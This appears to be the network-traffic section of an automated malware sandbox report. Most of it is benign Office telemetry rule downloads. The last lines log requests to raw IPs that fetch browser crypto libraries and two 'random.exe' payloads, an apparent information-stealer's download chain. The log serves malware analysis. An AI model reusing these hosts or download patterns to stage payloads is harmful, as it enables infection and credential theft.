Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
